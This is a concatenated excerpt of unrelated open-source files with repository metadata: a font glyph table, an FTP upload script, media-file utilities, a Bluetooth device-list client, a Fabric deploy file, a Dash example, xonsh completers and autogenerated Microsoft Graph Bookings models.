[ 18, 8, 12, 11, 1, -10 ], # 0x24 '$'
[ 30, 7, 11, 11, 2, -10 ], # 0x25 '%'
[ 40, 7, 10, 11, 2, -9 ], # 0x26 '&'
[ 49, 3, 5, 11, 4, -10 ], # 0x27 '''
[ 51, 2, 13, 11, 5, -10 ], # 0x28 '('
[ 55, 2, 13, 11, 4, -10 ], # 0x29 ')'
[ 59, 7, 7, 11, 2, -10 ], # 0x2A '#'
[ 66, 7, 7, 11, 2, -8 ], # 0x2B '+'
[ 73, 3, 5, 11, 2, -1 ], # 0x2C ','
[ 75, 9, 1, 11, 1, -5 ], # 0x2D '-'
[ 77, 2, 2, 11, 4, -1 ], # 0x2E '.'
[ 78, 7, 13, 11, 2, -11 ], # 0x2F '/'
[ 90, 7, 11, 11, 2, -10 ], # 0x30 '0'
[ 100, 5, 11, 11, 3, -10 ], # 0x31 '1'
[ 107, 7, 11, 11, 2, -10 ], # 0x32 '2'
[ 117, 8, 11, 11, 1, -10 ], # 0x33 '3'
[ 128, 6, 11, 11, 3, -10 ], # 0x34 '4'
[ 137, 7, 11, 11, 2, -10 ], # 0x35 '5'
[ 147, 7, 11, 11, 2, -10 ], # 0x36 '6'
[ 157, 7, 11, 11, 2, -10 ], # 0x37 '7'
[ 167, 7, 11, 11, 2, -10 ], # 0x38 '8'
[ 177, 7, 11, 11, 2, -10 ], # 0x39 '9'
[ 187, 2, 8, 11, 4, -7 ], # 0x3A ':'
[ 189, 3, 11, 11, 3, -7 ], # 0x3B ''
[ 194, 8, 8, 11, 1, -8 ], # 0x3C '<'
[ 202, 9, 4, 11, 1, -6 ], # 0x3D '='
[ 207, 9, 8, 11, 1, -8 ], # 0x3E '>'
[ 216, 7, 10, 11, 2, -9 ], # 0x3F '?'
[ 225, 8, 12, 11, 2, -10 ], # 0x40 '@'
[ 237, 11, 10, 11, 0, -9 ], # 0x41 'A'
[ 251, 9, 10, 11, 1, -9 ], # 0x42 'B'
[ 263, 9, 10, 11, 1, -9 ], # 0x43 'C'
[ 275, 9, 10, 11, 1, -9 ], # 0x44 'D'
[ 287, 9, 10, 11, 1, -9 ], # 0x45 'E'
[ 299, 9, 10, 11, 1, -9 ], # 0x46 'F'
[ 311, 10, 10, 11, 1, -9 ], # 0x47 'G'
[ 324, 9, 10, 11, 1, -9 ], # 0x48 'H'
[ 336, 5, 10, 11, 3, -9 ], # 0x49 'I'
[ 343, 8, 10, 11, 2, -9 ], # 0x4A 'J'
[ 353, 9, 10, 11, 1, -9 ], # 0x4B 'K'
[ 365, 8, 10, 11, 2, -9 ], # 0x4C 'L'
[ 375, 11, 10, 11, 0, -9 ], # 0x4D 'M'
[ 389, 9, 10, 11, 1, -9 ], # 0x4E 'N'
[ 401, 9, 10, 11, 1, -9 ], # 0x4F 'O'
[ 413, 8, 10, 11, 1, -9 ], # 0x50 'P'
[ 423, 9, 13, 11, 1, -9 ], # 0x51 'Q'
[ 438, 9, 10, 11, 1, -9 ], # 0x52 'R'
[ 450, 7, 10, 11, 2, -9 ], # 0x53 'S'
[ 459, 9, 10, 11, 1, -9 ], # 0x54 'T'
[ 471, 9, 10, 11, 1, -9 ], # 0x55 'U'
[ 483, 11, 10, 11, 0, -9 ], # 0x56 'V'
[ 497, 11, 10, 11, 0, -9 ], # 0x57 'W'
[ 511, 9, 10, 11, 1, -9 ], # 0x58 'X'
[ 523, 9, 10, 11, 1, -9 ], # 0x59 'Y'
[ 535, 7, 10, 11, 2, -9 ], # 0x5A 'Z'
[ 544, 2, 13, 11, 5, -10 ], # 0x5B '['
[ 548, 7, 13, 11, 2, -11 ], # 0x5C '\'
[ 560, 2, 13, 11, 4, -10 ], # 0x5D ']'
[ 564, 7, 5, 11, 2, -10 ], # 0x5E '^'
[ 569, 11, 1, 11, 0, 2 ], # 0x5F '_'
[ 571, 3, 3, 11, 3, -11 ], # 0x60 '`'
[ 573, 9, 8, 11, 1, -7 ], # 0x61 'a'
[ 582, 9, 11, 11, 1, -10 ], # 0x62 'b'
[ 595, 7, 8, 11, 2, -7 ], # 0x63 'c'
[ 602, 9, 11, 11, 1, -10 ], # 0x64 'd'
[ 615, 8, 8, 11, 1, -7 ], # 0x65 'e'
[ 623, 6, 11, 11, 3, -10 ], # 0x66 'f'
[ 632, 9, 11, 11, 1, -7 ], # 0x67 'g'
[ 645, 9, 11, 11, 1, -10 ], # 0x68 'h'
[ 658, 7, 10, 11, 2, -9 ], # 0x69 'i'
[ 667, 5, 13, 11, 3, -9 ], # 0x6A 'j'
[ 676, 8, 11, 11, 2, -10 ], # 0x6B 'k'
[ 687, 7, 11, 11, 2, -10 ], # 0x6C 'l'
[ 697, 9, 8, 11, 1, -7 ], # 0x6D 'm'
[ 706, 9, 8, 11, 1, -7 ], # 0x6E 'n'
[ 715, 9, 8, 11, 1, -7 ], # 0x6F 'o'
[ 724, 9, 11, 11, 1, -7 ], # 0x70 'p'
[ 737, 9, 11, 11, 1, -7 ], # 0x71 'q'
[ 750, 7, 8, 11, 3, -7 ], # 0x72 'r'
[ 757, 7, 8, 11, 2, -7 ], # 0x73 's'
[ 764, 8, 10, 11, 2, -9 ], # 0x74 't'
[ 774, 8, 8, 11, 1, -7 ], # 0x75 'u'
[ 782, 9, 8, 11, 1, -7 ], # 0x76 'v'
[ 791, 9, 8, 11, 1, -7 ], # 0x77 'w'
[ 800, 9, 8, 11, 1, -7 ], # 0x78 'x'
[ 809, 9, 11, 11, 1, -7 ], # 0x79 'y'
[ 822, 7, 8, 11, 2, -7 ], # 0x7A 'z'
[ 829, 3, 13, 11, 4, -10 ], # 0x7B '['
[ 834, 1, 13, 11, 5, -10 ], # 0x7C '|'
[ 836, 3, 13, 11, 4, -10 ], # 0x7D ']'
[ 841, 7, 3, 11, 2, -6 ] ] # 0x7E '~'
# Font descriptor: [bitmap data, glyph table, first ASCII code (0x20 ' '),
# last ASCII code (0x7E '~'), line advance in pixels (18)].
# NOTE(review): layout appears to mirror the Adafruit GFX font format
# (bitmaps + per-glyph metrics + code range) -- confirm against the
# consuming renderer.
FreeMono9pt7b = [
FreeMono9pt7bBitmaps,
FreeMono9pt7bGlyphs,
0x20, 0x7E, 18 ]
# Approx. 1516 bytes
| 1.101563 | 1 |
misc/vulnpwn/lib/core/exceptions.py | all3g/pieces | 34 | 12762186 | #!/usr/bin/python
# -*- coding: utf-8 -*-
##
# Current source: https://github.com/open-security/vulnpwn/
##
class FrameworkException(Exception):
    """Base class for every error raised by the framework."""
class OptionValidationError(FrameworkException):
    """Raised when a module option value fails validation."""
| 1.5 | 2 |
fileup.py | basnijholt/fileup | 0 | 12762187 | #!/usr/bin/env python
# -*-Python-*-
import argparse
import contextlib
import datetime
import ftplib
import os
import re
import subprocess
import tempfile
def get_valid_filename(s):
    """Sanitize *s* so it can safely be used as a filename.

    Leading/trailing whitespace is removed, interior spaces become
    underscores, and every character that is not alphanumeric, a dash,
    an underscore, or a dot is dropped.

    >>> get_valid_filename("john's portrait in 2004.jpg")
    'johns_portrait_in_2004.jpg'
    """
    underscored = s.strip().replace(" ", "_")
    forbidden = re.compile(r"(?u)[^-\w.]")
    return forbidden.sub("", underscored)
def read_config():
    """Read the fileup FTP settings from ``~/.config/fileup/config``.

    The config file must contain exactly five lines, in this order::

        example.com              (FTP host)
        base_folder              (remote base directory)
        file_up_folder           (sub-folder used for uploads)
        my_user_name
        my_difficult_password

    Returns the tuple ``(base_url, base_folder, folder, user, pw)``.
    """
    # The previous inline docstring (a no-op string expression inside the
    # `with` block) listed only four config lines although five values are
    # unpacked; it is replaced by the function docstring above, matching
    # the description printed by main()'s --help.
    with open(os.path.expanduser("~/.config/fileup/config")) as f:
        base_url, base_folder, folder, user, pw = [
            s.replace("\n", "") for s in f.readlines()
        ]
    return base_url, base_folder, folder, user, pw
def remove_old_files(ftp, today):
    """Delete every remote file whose ``_delete_on_<date>`` marker expired.

    For each expired entry both the payload file and its marker file are
    removed; *today* is compared against the ISO date in the marker name.
    """
    for marker in [n for n in ftp.nlst() if "_delete_on_" in n]:
        payload, _, stamp = marker.rpartition("_delete_on_")
        expiry = datetime.datetime.strptime(stamp, "%Y-%m-%d").date()
        if expiry >= today:
            continue
        print(f'removing "{payload}" because the date passed')
        try:
            ftp.delete(payload)
        except Exception:
            # File didn't exist anymore for some reason...
            pass
        ftp.delete(payload + "_delete_on_" + stamp)
def main():
    """Upload a file via FTP, optionally with an expiry marker, and print
    (and on macOS copy to the clipboard) the resulting public URL."""
    # Get arguments
    description = [
        "Publish a file. \n \n",
        "Create a config file at ~/.config/fileup/config with the following information and structure:\n",
        "example.com",
        "base_folder",
        "file_up_folder",
        "my_user_name",
        "my_difficult_password",
    ]
    parser = argparse.ArgumentParser(
        description="\n".join(description),
        formatter_class=argparse.RawTextHelpFormatter,
    )
    parser.add_argument("fname", type=str)
    parser.add_argument(
        "-t",
        "--time",
        type=int,
        default=90,
        help="If time is 0 the file will never be deleted, default is 90 days.",
    )
    parser.add_argument("-d", "--direct", action="store_true")
    parser.add_argument("-i", "--img", action="store_true")
    args = parser.parse_args()
    fname = os.path.abspath(os.path.expanduser(args.fname))
    fname_base = os.path.basename(fname)
    base_url, base_folder, folder, user, pw = read_config()
    # Connect to server
    ftp = ftplib.FTP(base_url, user, pw)
    ftp.cwd(os.path.join(base_folder, folder))
    # Fix the filename to avoid filename character issues
    fname_base = get_valid_filename(fname_base)
    today = datetime.datetime.now().date()
    remove_old_files(ftp, today)
    # Delete first if file already exists, it could happen that there is
    # already a file with a specified deletion date, these should be removed.
    for f in ftp.nlst():
        if f.startswith(fname_base) and "_delete_on_" in f:
            ftp.delete(f)
    if args.time != 0:  # could be negative (used for debugging).
        # Upload an *empty* companion file whose name encodes the expiry
        # date; remove_old_files() uses it on later runs.
        remove_on = today + datetime.timedelta(days=args.time)
        fname_date = fname_base + "_delete_on_" + str(remove_on)
        with tempfile.TemporaryFile() as f:
            print("upload " + fname_date)
            ftp.storbinary(f"STOR {fname_date}", f)
    # Upload and open the actual file
    with open(fname, "rb") as f:
        ftp.storbinary(f"STOR {fname_base}", f)
        print("upload " + fname_base)
    ftp.quit()
    # Create URL
    if folder:
        url = f"{base_url}/{folder}/{fname_base}"
    else:
        url = f"{base_url}/{fname_base}"
    if args.direct:
        # Returns the url as is.
        url = "http://" + url
    elif args.img:
        # Markdown inline-image syntax.
        url = f"![]({url})"
    elif fname.endswith(".ipynb"):
        # Return the url in the nbviewer
        url = "http://nbviewer.jupyter.org/url/" + url + "?flush_cache=true"
    else:
        url = "http://" + url
    # Put a URL into clipboard only works on OS X
    with contextlib.suppress(Exception):
        process = subprocess.Popen(
            "pbcopy", env={"LANG": "en_US.UTF-8"}, stdin=subprocess.PIPE
        )
        process.communicate(url.encode("utf-8"))
    print("Your url is: ", url)
# Script entry point.
if __name__ == "__main__":
    main()
| 3.296875 | 3 |
redact/tools/utils.py | brighter-ai/ips-client | 1 | 12762188 | import glob
from pathlib import Path
from typing import List, Union
# Recognized file extensions per media category, in the canonical form
# produced by file_extension(): lowercase, without the leading dot.
ARCHIVE_EXTENSIONS = ['tar']
IMG_EXTENSIONS = ['jpeg', 'jpg', 'bmp', 'png']
VID_EXTENSIONS = ['mp4', 'avi', 'mov', 'mkv', 'mts', 'ts', 'webm']
def normalize_path(path: Union[str, Path]) -> Path:
    """Return *path* with ``~`` expanded and made absolute (symlinks resolved)."""
    expanded = Path(path).expanduser()
    return expanded.resolve()
def file_extension(path: str) -> str:
    """
    Return the canonical file extension of *path*: lowercase, with no
    leading dot (e.g. ``mp4``, ``jpeg``); empty string when there is none.
    """
    _, _, ext = Path(path).suffix.partition('.')
    return ext.lower()
def files_in_dir(dir: Path, recursive=True, sort=False) -> List[str]:
    """
    Return the files below *dir* as path strings.

    With ``recursive=True`` all subfolders are searched as well; with
    ``sort=True`` the result is sorted lexicographically.
    """
    pattern = '**' if recursive else '*'
    matches = glob.glob(str(Path(dir).joinpath(pattern)), recursive=recursive)
    found = [m for m in matches if Path(m).is_file()]
    if sort:
        found.sort()
    return found
def is_archive(file_path: str) -> bool:
    """
    True when *file_path* carries one of the ARCHIVE_EXTENSIONS.
    """
    return file_extension(file_path) in ARCHIVE_EXTENSIONS
def is_image(file_path: str) -> bool:
    """
    True when *file_path* carries one of the IMG_EXTENSIONS.
    """
    return file_extension(file_path) in IMG_EXTENSIONS
def is_video(file_path: str) -> bool:
    """
    True when *file_path* carries one of the VID_EXTENSIONS.
    """
    return file_extension(file_path) in VID_EXTENSIONS
def archives_in_dir(dir: Path, recursive=True, sort=False):
    """
    Yield every archive file below *dir* (optionally recursive / sorted).
    """
    yield from filter(is_archive,
                      files_in_dir(dir=dir, recursive=recursive, sort=sort))
def images_in_dir(dir: Path, recursive=True, sort=False):
    """
    Yield every image file below *dir* (optionally recursive / sorted).
    """
    yield from filter(is_image,
                      files_in_dir(dir=dir, recursive=recursive, sort=sort))
def videos_in_dir(dir: Path, recursive=True, sort=False):
    """
    Yield every video file below *dir* (optionally recursive / sorted).
    """
    yield from filter(is_video,
                      files_in_dir(dir=dir, recursive=recursive, sort=sort))
| 3.109375 | 3 |
exercicios/PythonExercicios/ex085.py | Roberto-Sartore/Python | 0 | 12762189 | num = [[], []]
valor = 0
for C in range (1, 8):
valor = int(input(f'Digite o {C}º. valor: '))
if valor % 2 == 0:
num[0].append(valor)
else:
num[1].append(valor)
print('=' * 48)
num[0].sort()
num[1].sort()
print(f'Os Valores pares digitados foram: {num[0]}')
print(f'Os Valores impares digitados foram: {num[1]}')
| 3.765625 | 4 |
client.py | lahiiru/BLE | 3 | 12762190 | from bluetooth import *
from time import sleep
import re, uuid
# Peer devices currently offering "helloService", and the subset that
# still needs to receive an updated device-list broadcast.
devices = set()
devices_to_update = set()
# MAC address of the local adapter, derived from uuid.getnode().
dev_mac = ':'.join(re.findall('..', '%012x' % uuid.getnode())).upper()
print(dev_mac)
def enable_ble():
    """Start the system bluetooth service and bring up the hci0 adapter.

    Requires passwordless sudo for systemctl/hciconfig; failures are
    printed and swallowed so the polling loop can keep running.
    """
    # `os` is not imported at module level (only re, uuid, time.sleep and
    # the wildcard bluetooth import are); import it locally so this
    # function cannot fail with NameError.
    import os
    print('enabling bluetooth')
    try:
        os.system('sudo systemctl start bluetooth.service && sudo hciconfig hci0 up')
    except Exception as e:
        print(e)
def job():
    """One discovery round: find "helloService" peers, diff them against
    the known set, and broadcast the updated device list when it changed."""
    print("\n\nPerforming inquiry...")
    new_devices = set()
    global devices_to_update
    services = find_service(name="helloService")
    print(services)
    for i in range(len(services)):
        match = services[i]
        if match["name"] == "helloService":
            port = match["port"]
            name = match["name"]
            host = match["host"]
            print(name, port, host)
            new_devices.add(host)
    # Hosts that appeared or disappeared since the last round.
    devices_diff_set = devices.symmetric_difference(new_devices)
    print("Diff set = %s"%devices_diff_set)
    devices_modified = False
    if len(devices_diff_set) > 0:
        for addr in devices_diff_set:
            if addr in new_devices:
                # Newly-seen host: track it and mark it for an update.
                devices.add(addr)
                devices_to_update.add(addr)
                devices_modified = True
            else:
                # Host vanished: forget it and drop any pending update.
                print("Removing device %s" % addr)
                devices.remove(addr)
                if addr in devices_to_update:
                    devices_to_update.remove(addr)
                devices_modified = True
    if devices_modified: # membership changed -> notify every known device
        devices_to_update = devices_to_update.union(devices)
    if len(devices_to_update) > 0:
        # "EOD" terminates the message so receivers know it is complete.
        update_message = "%sEOD" % devices
        print("Update message = %s" % update_message)
        # Iterate over a copy: entries are removed on successful send.
        for addr in devices_to_update.copy():
            try:
                print("Connecting to %s to send updated list" % addr)
                client_socket = BluetoothSocket(RFCOMM)
                client_socket.connect((addr, 1))
                client_socket.send(update_message)
                print("Sent to %s" % addr)
                client_socket.close()
                devices_to_update.remove(addr)
            except Exception as e:
                # Failed sends stay queued for the next round.
                print(e)
    else:
        print("No updates to send")
# Bring up bluetooth once, then poll for service changes every 5 seconds.
enable_ble()
while True:
    job()
    sleep(5)
| 2.8125 | 3 |
fabfile/__init__.py | nprapps/elections16-general | 2 | 12762191 | <reponame>nprapps/elections16-general<filename>fabfile/__init__.py<gh_stars>1-10
#!/usr/bin/env python
from datetime import datetime
import json
import os
from boto.s3.key import Key
from fabric.api import local, require, settings, task
from fabric.state import env
from termcolor import colored
import app_config
# Other fabfiles
from . import daemons
from . import data
from . import issues
from . import render
from . import text
from . import utils
if app_config.DEPLOY_TO_SERVERS:
from . import servers
# Bootstrap can only be run once, then it's disabled
if app_config.PROJECT_SLUG == '$NEW_PROJECT_SLUG':
from . import bootstrap
"""
Base configuration
"""
# Fabric connection defaults: connect as the configured service user with
# SSH agent forwarding; hosts are filled in by the environment tasks below.
env.user = app_config.SERVER_USER
env.forward_agent = True
env.hosts = []
"""
Environments
Changing environment requires a full-stack test.
An environment points to both a server and an S3
bucket.
"""
@task
def production():
    """
    Run as though on production: select the production deployment target
    and point fabric at its servers.
    """
    env.settings = 'production'
    app_config.configure_targets(env.settings)
    env.hosts = app_config.SERVERS
@task
def staging():
    """
    Run as though on staging: select the staging deployment target
    and point fabric at its servers.
    """
    env.settings = 'staging'
    app_config.configure_targets(env.settings)
    env.hosts = app_config.SERVERS
"""
Branches
Changing branches requires deploying that branch to a host.
"""
@task
def stable():
    """
    Work on the stable branch.
    """
    env.branch = 'stable'
@task
def master():
    """
    Work on the development (master) branch.
    """
    env.branch = 'master'
@task
def branch(branch_name):
    """
    Work on any specified branch.

    :param branch_name: name of the git branch to deploy from.
    """
    env.branch = branch_name
"""
Running the app
"""
@task
def app(port='8000'):
    """
    Serve app.py locally with gunicorn.

    :param port: local port to bind (default '8000').
    """
    # With a deployment target selected, export DEPLOYMENT_TARGET for the
    # app and log to a file; otherwise log to stdout.
    if env.get('settings'):
        local("DEPLOYMENT_TARGET=%s bash -c 'gunicorn -b 0.0.0.0:%s --timeout 3600 --debug --reload --log-file=logs/app.log app:wsgi_app'" % (env.settings, port))
    else:
        local('gunicorn -b 0.0.0.0:%s --timeout 3600 --debug --reload --log-file=- app:wsgi_app' % port)
@task
def tests():
    """
    Run Python unit tests.
    """
    local('nosetests')
"""
Deployment
Changes to deployment requires a full-stack test. Deployment
has two primary functions: Pushing flat files to S3 and deploying
code to a remote server if required.
"""
@task
def deploy_national_data():
    """
    Rebuild the data output folder with national results and sync to S3.
    """
    local('rm -rf {0}'.format(app_config.DATA_OUTPUT_FOLDER))
    local('mkdir {0}'.format(app_config.DATA_OUTPUT_FOLDER))
    render.render_all_national()
    deploy_data_folder()
@task
def deploy_presidential_data():
    """
    Rebuild the data output folder with presidential files and sync to S3.
    """
    local('rm -rf {0}'.format(app_config.DATA_OUTPUT_FOLDER))
    local('mkdir {0}'.format(app_config.DATA_OUTPUT_FOLDER))
    render.render_presidential_files()
    deploy_data_folder()
@task
def deploy_all_data():
    """
    Rebuild the data output folder with every rendered file and sync to S3.
    """
    local('rm -rf {0}'.format(app_config.DATA_OUTPUT_FOLDER))
    local('mkdir {0}'.format(app_config.DATA_OUTPUT_FOLDER))
    render.render_all()
    deploy_data_folder()
@task
def deploy_data_folder():
    """
    Upload the rendered data folder to S3 (public-read, 5-second cache).
    top-level-results.json is copied first so it is fresh before the bulk
    sync of the remaining files.
    """
    local('aws s3 cp {0}/top-level-results.json s3://{1}/{2}/data/ --acl public-read --cache-control max-age=5'.format(app_config.DATA_OUTPUT_FOLDER, app_config.S3_BUCKET, app_config.PROJECT_SLUG))
    local('aws s3 sync {0} s3://{1}/{2}/data/ --acl public-read --cache-control max-age=5'.format(app_config.DATA_OUTPUT_FOLDER, app_config.S3_BUCKET, app_config.PROJECT_SLUG))
"""
Destruction
Changes to destruction require setup/deploy to a test host in order to test.
Destruction should remove all files related to the project from both a remote
host and S3.
"""
@task
def shiva_the_destroyer():
    """
    Deletes the app from S3 (and, when configured, removes the project,
    crontab and service configs from the servers) after confirmation.
    """
    require('settings', provided_by=[production, staging])
    utils.confirm(
        colored("You are about to destroy everything deployed to %s for this project.\nDo you know what you're doing?')" % app_config.DEPLOYMENT_TARGET, "red")
    )
    with settings(warn_only=True):
        # NOTE(review): `flat` is never imported in this module (see the
        # imports at the top of the file), so this call will raise
        # NameError when executed -- confirm which module should provide
        # delete_folder.
        flat.delete_folder(app_config.S3_BUCKET, app_config.PROJECT_SLUG)
        if app_config.DEPLOY_TO_SERVERS:
            servers.delete_project()
            if app_config.DEPLOY_CRONTAB:
                servers.uninstall_crontab()
            if app_config.DEPLOY_SERVICES:
                servers.nuke_confs()
| 1.945313 | 2 |
examples/navitem_test.py | zmoxq/dash-bootstrap-components | 1 | 12762192 | <reponame>zmoxq/dash-bootstrap-components
import dash
import dash_bootstrap_components as dbc
import dash_html_components as html
from dash.dependencies import Input, Output
app = dash.Dash()
# Navigation bar exercising NavItem/NavLink plus a DropdownMenu with
# internal, external, divider, header, and no-op entries.
navbar = dbc.Navbar(
    brand="Dash Bootstrap components",
    brand_href="https://github.com/ASIDataScience/dash-bootstrap-components",
    sticky="top",
    children=[
        dbc.NavItem(dbc.NavLink("ASI", href="https://www.asidatascience.com")),
        dbc.DropdownMenu(
            nav=True,
            in_navbar=True,
            label="Menu",
            children=[
                dbc.DropdownMenuItem("Entry 1", href="https://google.com"),
                dbc.DropdownMenuItem(
                    "Entry 2", href="/test", id="dd-internal"
                ),
                dbc.DropdownMenuItem(divider=True),
                dbc.DropdownMenuItem("A heading", header=True),
                dbc.DropdownMenuItem(
                    "Entry 3", href="/external-test", external_link=True
                ),
                dbc.DropdownMenuItem("Entry 4 - does nothing", id="dd-button"),
            ],
        ),
    ],
)
# Page layout: the navbar plus two divs that echo dropdown click counts.
app.layout = html.Div(
    [navbar, html.Div(id="counter"), html.Div(id="counter2")]
)
# Show how many times the no-op dropdown entry was clicked.
@app.callback(Output("counter", "children"), [Input("dd-button", "n_clicks")])
def count(n):
    return str(n)
# Show how many times the internal-link dropdown entry was clicked.
@app.callback(
    Output("counter2", "children"), [Input("dd-internal", "n_clicks")]
)
def count2(n):
    return str(n)
if __name__ == "__main__":
    app.run_server(port=8888)
| 2.46875 | 2 |
xonsh/completers/xompletions.py | caputomarcos/xonsh | 0 | 12762193 | <filename>xonsh/completers/xompletions.py
"""Provides completions for xonsh internal utilities"""
import xonsh.xontribs as xx
import xonsh.tools as xt
def complete_xonfig(prefix, line, start, end, ctx):
    """Completion for ``xonfig``: subcommands at position 1, color style
    names after ``xonfig colors``; None when the line is not xonfig."""
    words = line.split(' ')
    if len(words) == 0 or words[0] != 'xonfig':
        return None
    position = words.index(prefix)
    if position == 1:
        candidates = {'info', 'wizard', 'styles', 'colors', '-h'}
    elif position == 2 and words[1] == 'colors':
        candidates = set(xt.color_style_names())
    else:
        raise StopIteration
    return {word for word in candidates if word.startswith(prefix)}
def _list_installed_xontribs():
    """Return the short names of every xontrib whose module can be found."""
    metadata = xx.xontrib_metadata()
    found = []
    for entry in metadata['xontribs']:
        spec = xx.find_xontrib(entry['name'])
        if spec is not None:
            found.append(spec.name.rsplit('.')[-1])
    return found
def complete_xontrib(prefix, line, start, end, ctx):
    """Completion for ``xontrib``: subcommands at position 1, installed
    xontrib names after ``xontrib load``; None when the line is not
    xontrib."""
    args = line.split(' ')
    if len(args) == 0 or args[0] != 'xontrib':
        return None
    curix = args.index(prefix)
    if curix == 1:
        possible = {'list', 'load'}
    elif curix == 2 and args[1] == 'load':
        possible = _list_installed_xontribs()
    else:
        # Previously `possible` was left unbound here (NameError) when
        # curix == 2 with a subcommand other than 'load'; raise
        # StopIteration instead, mirroring complete_xonfig above.
        raise StopIteration
    return {i for i in possible if i.startswith(prefix)}
| 2.453125 | 2 |
msgraph-cli-extensions/beta/bookings_beta/azext_bookings_beta/vendored_sdks/bookings/models/_models_py3.py | thewahome/msgraph-cli | 0 | 12762194 | <gh_stars>0
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import datetime
from typing import Dict, List, Optional, Union
from azure.core.exceptions import HttpResponseError
import msrest.serialization
from ._bookings_enums import *
class CollectionOfBookingAppointment(msrest.serialization.Model):
"""Collection of bookingAppointment.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param value:
:type value: list[~bookings.models.MicrosoftGraphBookingAppointment]
:param odata_next_link:
:type odata_next_link: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'value': {'key': 'value', 'type': '[MicrosoftGraphBookingAppointment]'},
'odata_next_link': {'key': '@odata\\.nextLink', 'type': 'str'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
value: Optional[List["MicrosoftGraphBookingAppointment"]] = None,
odata_next_link: Optional[str] = None,
**kwargs
):
super(CollectionOfBookingAppointment, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.value = value
self.odata_next_link = odata_next_link
class CollectionOfBookingAppointment0(msrest.serialization.Model):
"""Collection of bookingAppointment.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param value:
:type value: list[~bookings.models.MicrosoftGraphBookingAppointment]
:param odata_next_link:
:type odata_next_link: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'value': {'key': 'value', 'type': '[MicrosoftGraphBookingAppointment]'},
'odata_next_link': {'key': '@odata\\.nextLink', 'type': 'str'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
value: Optional[List["MicrosoftGraphBookingAppointment"]] = None,
odata_next_link: Optional[str] = None,
**kwargs
):
super(CollectionOfBookingAppointment0, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.value = value
self.odata_next_link = odata_next_link
class CollectionOfBookingBusiness(msrest.serialization.Model):
"""Collection of bookingBusiness.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param value:
:type value: list[~bookings.models.MicrosoftGraphBookingBusiness]
:param odata_next_link:
:type odata_next_link: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'value': {'key': 'value', 'type': '[MicrosoftGraphBookingBusiness]'},
'odata_next_link': {'key': '@odata\\.nextLink', 'type': 'str'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
value: Optional[List["MicrosoftGraphBookingBusiness"]] = None,
odata_next_link: Optional[str] = None,
**kwargs
):
super(CollectionOfBookingBusiness, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.value = value
self.odata_next_link = odata_next_link
class CollectionOfBookingCurrency(msrest.serialization.Model):
"""Collection of bookingCurrency.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param value:
:type value: list[~bookings.models.MicrosoftGraphBookingCurrency]
:param odata_next_link:
:type odata_next_link: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'value': {'key': 'value', 'type': '[MicrosoftGraphBookingCurrency]'},
'odata_next_link': {'key': '@odata\\.nextLink', 'type': 'str'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
value: Optional[List["MicrosoftGraphBookingCurrency"]] = None,
odata_next_link: Optional[str] = None,
**kwargs
):
super(CollectionOfBookingCurrency, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.value = value
self.odata_next_link = odata_next_link
class CollectionOfBookingCustomer(msrest.serialization.Model):
"""Collection of bookingCustomer.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param value:
:type value: list[~bookings.models.MicrosoftGraphBookingCustomer]
:param odata_next_link:
:type odata_next_link: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'value': {'key': 'value', 'type': '[MicrosoftGraphBookingCustomer]'},
'odata_next_link': {'key': '@odata\\.nextLink', 'type': 'str'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
value: Optional[List["MicrosoftGraphBookingCustomer"]] = None,
odata_next_link: Optional[str] = None,
**kwargs
):
super(CollectionOfBookingCustomer, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.value = value
self.odata_next_link = odata_next_link
class CollectionOfBookingService(msrest.serialization.Model):
"""Collection of bookingService.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param value:
:type value: list[~bookings.models.MicrosoftGraphBookingService]
:param odata_next_link:
:type odata_next_link: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'value': {'key': 'value', 'type': '[MicrosoftGraphBookingService]'},
'odata_next_link': {'key': '@odata\\.nextLink', 'type': 'str'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
value: Optional[List["MicrosoftGraphBookingService"]] = None,
odata_next_link: Optional[str] = None,
**kwargs
):
super(CollectionOfBookingService, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.value = value
self.odata_next_link = odata_next_link
class CollectionOfBookingStaffMember(msrest.serialization.Model):
"""Collection of bookingStaffMember.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param value:
:type value: list[~bookings.models.MicrosoftGraphBookingStaffMember]
:param odata_next_link:
:type odata_next_link: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'value': {'key': 'value', 'type': '[MicrosoftGraphBookingStaffMember]'},
'odata_next_link': {'key': '@odata\\.nextLink', 'type': 'str'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
value: Optional[List["MicrosoftGraphBookingStaffMember"]] = None,
odata_next_link: Optional[str] = None,
**kwargs
):
